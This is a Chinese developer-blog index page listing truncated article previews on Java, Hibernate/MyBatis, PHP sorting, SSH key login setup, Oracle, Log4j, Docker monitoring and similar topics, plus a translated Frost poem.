    package com.demo; /** * @Description 类加载顺序 * @author FuJianyong * 2015-2-6上午11:21:37 */ public class ClassLoaderSequence { String s1 = "成员属性"; static String s2 = "
  • Hibernate与mybitas的比较 BlueSkator sqlHibernate框架ibatisorm
    第一章     Hibernate与MyBatis Hibernate 是当前最流行的O/R mapping框架,它出身于sf.net,现在已经成为Jboss的一部分。 Mybatis 是另外一种优秀的O/R mapping框架。目前属于apache的一个子项目。 MyBatis 参考资料官网:http:
  • php多维数组排序以及实际工作中的应用 dcj3sjt126com PHPusortuasort
    自定义排序函数返回false或负数意味着第一个参数应该排在第二个参数的前面, 正数或true反之, 0相等usort不保存键名uasort 键名会保存下来uksort 排序是对键名进行的 <!doctype html> <html lang="en"> <head> <meta charset="utf-8&q
  • DOM改变字体大小 周华华 前端
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • c3p0的配置 g21121 c3p0
    c3p0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。c3p0的下载地址是:http://sourceforge.net/projects/c3p0/这里可以下载到c3p0最新版本。 以在spring中配置dataSource为例: <!-- spring加载资源文件 --> <bean name="prope
  • Java获取工程路径的几种方法 510888780 java
    第一种: File f = new File(this.getClass().getResource("/").getPath()); System.out.println(f); 结果: C:\Documents%20and%20Settings\Administrator\workspace\projectName\bin 获取当前类的所在工程路径; 如果不加“
  • 在类Unix系统下实现SSH免密码登录服务器 Harry642 免密ssh
    1.客户机     (1)执行ssh-keygen -t rsa -C "[email protected]"生成公钥,xxx为自定义大email地址     (2)执行scp ~/.ssh/id_rsa.pub root@xxxxxxxxx:/tmp将公钥拷贝到服务器上,xxx为服务器地址     (3)执行cat
  • Java新手入门的30个基本概念一 aijuans javajava 入门新手
    在我们学习Java的过程中,掌握其中的基本概念对我们的学习无论是J2SE,J2EE,J2ME都是很重要的,J2SE是Java的基础,所以有必要对其中的基本概念做以归纳,以便大家在以后的学习过程中更好的理解java的精髓,在此我总结了30条基本的概念。  Java概述:  目前Java主要应用于中间件的开发(middleware)---处理客户机于服务器之间的通信技术,早期的实践证明,Java不适合
  • Memcached for windows 简单介绍 antlove javaWebwindowscachememcached
    1. 安装memcached server a. 下载memcached-1.2.6-win32-bin.zip b. 解压缩,dos 窗口切换到 memcached.exe所在目录,运行memcached.exe -d install c.启动memcached Server,直接在dos窗口键入 net start "memcached Server&quo
  • 数据库对象的视图和索引 百合不是茶 索引oeacle数据库视图
      视图     视图是从一个表或视图导出的表,也可以是从多个表或视图导出的表。视图是一个虚表,数据库不对视图所对应的数据进行实际存储,只存储视图的定义,对视图的数据进行操作时,只能将字段定义为视图,不能将具体的数据定义为视图       为什么oracle需要视图;    &
  • Mockito(一) --入门篇 bijian1013 持续集成mockito单元测试
            Mockito是一个针对Java的mocking框架,它与EasyMock和jMock很相似,但是通过在执行后校验什么已经被调用,它消除了对期望 行为(expectations)的需要。其它的mocking库需要你在执行前记录期望行为(expectations),而这导致了丑陋的初始化代码。  &nb
  • 精通Oracle10编程SQL(5)SQL函数 bijian1013 oracle数据库plsql
    /* * SQL函数 */ --数字函数 --ABS(n):返回数字n的绝对值 declare v_abs number(6,2); begin v_abs:=abs(&no); dbms_output.put_line('绝对值:'||v_abs); end; --ACOS(n):返回数字n的反余弦值,输入值的范围是-1~1,输出值的单位为弧度
  • 【Log4j一】Log4j总体介绍 bit1129 log4j
    Log4j组件:Logger、Appender、Layout   Log4j核心包含三个组件:logger、appender和layout。这三个组件协作提供日志功能: 日志的输出目标 日志的输出格式 日志的输出级别(是否抑制日志的输出)  logger继承特性 A logger is said to be an ancestor of anothe
  • Java IO笔记 白糖_ java
    public static void main(String[] args) throws IOException { //输入流 InputStream in = Test.class.getResourceAsStream("/test"); InputStreamReader isr = new InputStreamReader(in); Bu
  • Docker 监控 ronin47 docker监控
             目前项目内部署了docker,于是涉及到关于监控的事情,参考一些经典实例以及一些自己的想法,总结一下思路。 1、关于监控的内容 监控宿主机本身 监控宿主机本身还是比较简单的,同其他服务器监控类似,对cpu、network、io、disk等做通用的检查,这里不再细说。 额外的,因为是docker的
  • java-顺时针打印图形 bylijinnan java
    一个画图程序 要求打印出: 1.int i=5; 2.1 2 3 4 5 3.16 17 18 19 6 4.15 24 25 20 7 5.14 23 22 21 8 6.13 12 11 10 9 7. 8.int i=6 9.1 2 3 4 5 6 10.20 21 22 23 24 7 11.19
  • 关于iReport汉化版强制使用英文的配置方法 Kai_Ge iReport汉化英文版
    对于那些具有强迫症的工程师来说,软件汉化固然好用,但是汉化不完整却极为头疼,本方法针对iReport汉化不完整的情况,强制使用英文版,方法如下: 在 iReport 安装路径下的 etc/ireport.conf 里增加红色部分启动参数,即可变为英文版。   # ${HOME} will be replaced by user home directory accordin
  • [并行计算]论宇宙的可计算性 comsci 并行计算
          现在我们知道,一个涡旋系统具有并行计算能力.按照自然运动理论,这个系统也同时具有存储能力,同时具备计算和存储能力的系统,在某种条件下一般都会产生意识......       那么,这种概念让我们推论出一个结论     &nb
  • 用OpenGL实现无限循环的coverflow dai_lm androidcoverflow
    网上找了很久,都是用Gallery实现的,效果不是很满意,结果发现这个用OpenGL实现的,稍微修改了一下源码,实现了无限循环功能 源码地址: https://github.com/jackfengji/glcoverflow public class CoverFlowOpenGL extends GLSurfaceView implements GLSurfaceV
  • JAVA数据计算的几个解决方案1 datamachine javaHibernate计算
    老大丢过来的软件跑了10天,摸到点门道,正好跟以前攒的私房有关联,整理存档。 -----------------------------华丽的分割线-------------------------------------     数据计算层是指介于数据存储和应用程序之间,负责计算数据存储层的数据,并将计算结果返回应用程序的层次。J  &nbs
  • 简单的用户授权系统,利用给user表添加一个字段标识管理员的方式 dcj3sjt126com yii
    怎么创建一个简单的(非 RBAC)用户授权系统 通过查看论坛,我发现这是一个常见的问题,所以我决定写这篇文章。 本文只包括授权系统.假设你已经知道怎么创建身份验证系统(登录)。 数据库 首先在 user 表创建一个新的字段(integer 类型),字段名 'accessLevel',它定义了用户的访问权限 扩展 CWebUser 类 在配置文件(一般为 protecte
  • 未选之路 dcj3sjt126com
    作者:罗伯特*费罗斯特   黄色的树林里分出两条路, 可惜我不能同时去涉足, 我在那路口久久伫立, 我向着一条路极目望去, 直到它消失在丛林深处.   但我却选了另外一条路, 它荒草萋萋,十分幽寂; 显得更诱人,更美丽, 虽然在这两条小路上, 都很少留下旅人的足迹.   那天清晨落叶满地, 两条路都未见脚印痕迹. 呵,留下一条路等改日再
  • Java处理15位身份证变18位 蕃薯耀 18位身份证变15位15位身份证变18位身份证转换
      15位身份证变18位,18位身份证变15位 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--应用上下文配置【AppConfig】 hanqunfeng springmvc4
    从spring3.0开始,Spring将JavaConfig整合到核心模块,普通的POJO只需要标注@Configuration注解,就可以成为spring配置类,并通过在方法上标注@Bean注解的方式注入bean。   Xml配置和Java类配置对比如下: applicationContext-AppConfig.xml   <!-- 激活自动代理功能 参看:
  • Android中webview跟JAVASCRIPT中的交互 jackyrong JavaScripthtmlandroid脚本
      在android的应用程序中,可以直接调用webview中的javascript代码,而webview中的javascript代码,也可以去调用ANDROID应用程序(也就是JAVA部分的代码).下面举例说明之: 1 JAVASCRIPT脚本调用android程序    要在webview中,调用addJavascriptInterface(OBJ,int
  • 8个最佳Web开发资源推荐 lampcy 编程Web程序员
    Web开发对程序员来说是一项较为复杂的工作,程序员需要快速地满足用户需求。如今很多的在线资源可以给程序员提供帮助,比如指导手册、在线课程和一些参考资料,而且这些资源基本都是免费和适合初学者的。无论你是需要选择一门新的编程语言,或是了解最新的标准,还是需要从其他地方找到一些灵感,我们这里为你整理了一些很好的Web开发资源,帮助你更成功地进行Web开发。 这里列出10个最佳Web开发资源,它们都是受
  • 架构师之面试------jdk的hashMap实现 nannan408 HashMap
    1.前言。   如题。 2.详述。   (1)hashMap算法就是数组链表。数组存放的元素是键值对。jdk通过移位算法(其实也就是简单的加乘算法),如下代码来生成数组下标(生成后indexFor一下就成下标了)。 static int hash(int h) { h ^= (h >>> 20) ^ (h >>>
  • html禁止清除input文本输入缓存 Rainbow702 html缓存input输入框change
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。 如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off";  <input type="text" autocomplete="off" n
  • POJO和JavaBean的区别和联系 tjmljw POJOjava beans
    POJO 和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Pure Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比 POJO复杂很多, Java Bean 是可复用的组件,对 Java Bean 并没有严格的规
  • java中单例的五种写法 liuxiaoling java单例
    /** * 单例模式的五种写法: * 1、懒汉 * 2、恶汉 * 3、静态内部类 * 4、枚举 * 5、双重校验锁 */ /** * 五、 双重校验锁,在当前的内存模型中无效 */ class LockSingleton { private volatile static LockSingleton singleton; pri
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他